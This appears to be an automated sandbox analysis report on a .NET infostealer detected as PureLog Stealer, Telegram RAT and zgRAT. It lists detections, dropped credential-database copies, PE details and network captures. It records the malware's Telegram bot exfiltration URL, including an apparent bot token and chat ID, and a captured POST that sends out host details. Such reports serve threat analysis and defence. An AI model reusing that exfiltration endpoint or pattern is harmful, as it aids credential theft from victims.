Source: Yara match	File source: 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: JFFjXW16yR.exe, type: SAMPLE
Source: Yara match	File source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1699400216.0000000000F02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: JFFjXW16yR.exe, type: SAMPLE
Source: Yara match	File source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	1 Credentials in Registry	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
JFFjXW16yR.exe	100%	Avira	HEUR/AGEN.1323341
JFFjXW16yR.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendDocument?chat_id=6333631912&caption=??%20OC%20verison%20-%20Microsoft%20Windows%20NT%206.2.9200.0%0AMachineName%20-%20767668/user%0ACurrent%20time%20-%2008/10/2024%2007:52:00	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org	JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003679000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://api.telegram.org/bot	JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://api.telegram.org/bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendDocument?chat_id=6333	JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003663000.00000004.00000800.00020000.00000000.sdmp, JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003679000.00000004.00000800.00020000.00000000.sdmp, JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://api.telegram.org	JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003693000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003679000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/botE7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5UF/sendDocument?chat_id=G6	JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528942
Start date and time:	2024-10-08 13:51:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	JFFjXW16yR.exe renamed because original name is a hash value
Original Sample Name:	d9571b8bc83fb768f27c1a7e0565d16c5ebd9508e4c6d9c15474d2c53df99e93.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/4@1/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Execution Graph export aborted for target JFFjXW16yR.exe, PID 2944 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: JFFjXW16yR.exe

Simulations

Behavior and APIs

Time	Type	Description
07:52:02	API Interceptor	1x Sleep call for process: JFFjXW16yR.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Get hash	malicious	AgentTesla	Browse
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	RFQ PAL-10GN SN 2001964_xls.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Urgent inquiry for quotation .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rPedidoactualizado.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	RFQ PAL-10GN SN 2001964_xls.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Urgent inquiry for quotation .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rPedidoactualizado.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	RFQ PAL-10GN SN 2001964_xls.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Urgent inquiry for quotation .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VmRHSCaiyc.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT 103 202410071519130850 071024.pdf.vbs	Get hash	malicious	Remcos	Browse	149.154.167.220
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	po 1105670313_pdf.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATIONS#08673.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	shipping.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\JFFjXW16yR.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQEAHKKkKYHKGSI6oPtHTH0
MD5:	578A9969E472E71F38254887263D82A4
SHA1:	8ED7FC31B0F6660DBAC702BC603FBF4FE88B2F5D
SHA-256:	AB8369CDA9CB7709E00867CE5460553393ABF742CBD58501AD6113FDF884B938
SHA-512:	E55F7150298EF037848826E79EB72AD03D3D75C278D91CF0EA6AE3C04B89D4ABBD7BD2D5EB274715687012B90F51D53056F01CDBF5DDBB602711E66909C8BD87
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..

C:\Users\user\AppData\Local\Temp\tmp18BD.tmp.dat

Download File

Process:	C:\Users\user\Desktop\JFFjXW16yR.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp18ED.tmp.dat

Download File

Process:	C:\Users\user\Desktop\JFFjXW16yR.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\loginFile.db

Download File

Process:	C:\Users\user\Desktop\JFFjXW16yR.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.7996497074177755
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	JFFjXW16yR.exe
File size:	399'872 bytes
MD5:	074c4994bc41a053e18c4e5d37e5b62b
SHA1:	47947622d88d6881f85bae692a3d4202f04bcb03
SHA256:	d9571b8bc83fb768f27c1a7e0565d16c5ebd9508e4c6d9c15474d2c53df99e93
SHA512:	87b4ba11e006ba455d639fb3f21aa29860d83a5aef8ec3b3ac7214be20fc342a41b0a7ce16cea896dd05d9ba9a01aa93164066f8b69496464e0334568ccdb2c1
SSDEEP:	6144:8BcqRsX8d8Vnw1qiyqmYZ6qW51bxOk/nz8DbqS:8pSSqiRZO5XOUzge
TLSH:	65841817FADB9C20C1D88777C2DB400047B586A5BAD7E71B348A13FA58033BBE98A557
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................n/... ...@....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x462f6e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BCE2B0 [Wed Aug 14 17:00:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x62f20	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x4d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x60f74	0x61000	f4c011b79d9f86c193c46d2bbd053a3e	False	0.43776930976159795	data	5.81076124817549	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x4d0	0x600	1ec5df6437114c642f929c3f1d212619	False	0.37109375	data	3.7110556117881894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	153a119317f9afaa77f8e9d4a65d40bc	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x244	data			0.46206896551724136
RT_MANIFEST	0x642e4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 13:52:02.162760973 CEST	49730	443	192.168.2.4	149.154.167.220
Oct 8, 2024 13:52:02.162801027 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:02.162874937 CEST	49730	443	192.168.2.4	149.154.167.220
Oct 8, 2024 13:52:02.177783012 CEST	49730	443	192.168.2.4	149.154.167.220
Oct 8, 2024 13:52:02.177800894 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:02.801635981 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:02.801742077 CEST	49730	443	192.168.2.4	149.154.167.220
Oct 8, 2024 13:52:02.805197954 CEST	49730	443	192.168.2.4	149.154.167.220
Oct 8, 2024 13:52:02.805206060 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:02.805497885 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:02.847587109 CEST	49730	443	192.168.2.4	149.154.167.220
Oct 8, 2024 13:52:02.855756998 CEST	49730	443	192.168.2.4	149.154.167.220
Oct 8, 2024 13:52:02.903404951 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:03.097419977 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:03.098814011 CEST	49730	443	192.168.2.4	149.154.167.220
Oct 8, 2024 13:52:03.098848104 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:03.326375008 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:03.326814890 CEST	443	49730	149.154.167.220	192.168.2.4
Oct 8, 2024 13:52:03.326874971 CEST	49730	443	192.168.2.4	149.154.167.220
Oct 8, 2024 13:52:03.333559990 CEST	49730	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 13:52:02.147943020 CEST	50626	53	192.168.2.4	1.1.1.1
Oct 8, 2024 13:52:02.157057047 CEST	53	50626	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 13:52:02.147943020 CEST	192.168.2.4	1.1.1.1	0x61dc	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 13:52:02.157057047 CEST	1.1.1.1	192.168.2.4	0x61dc	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	149.154.167.220	443	2944	C:\Users\user\Desktop\JFFjXW16yR.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 11:52:02 UTC	424	OUT	POST /bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendDocument?chat_id=6333631912&caption=??%20OC%20verison%20-%20Microsoft%20Windows%20NT%206.2.9200.0%0AMachineName%20-%20767668/user%0ACurrent%20time%20-%2008/10/2024%2007:52:00 HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce76e17bd62bd Host: api.telegram.org Content-Length: 389 Expect: 100-continue Connection: Keep-Alive
2024-10-08 11:52:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-08 11:52:03 UTC	389	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 36 65 31 37 62 64 36 32 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 37 36 37 36 36 38 2d 6a 6f 6e 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 4f 43 20 76 65 72 69 73 6f 6e 20 2d 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 32 2e 39 32 30 30 2e 30 0a 4d 61 63 68 69 6e 65 4e 61 6d 65 20 2d 20 37 36 37 36 36 38 2f 6a 6f 6e 65 73 0a 43 75 72 72 65 6e 74 20 74 69 6d 65 20 Data Ascii: --------------------------8dce76e17bd62bdContent-Disposition: form-data; name="document"; filename="767668-user.txt"Content-Type: application/x-ms-dos-executableOC verison - Microsoft Windows NT 6.2.9200.0MachineName - 767668/userCurrent time
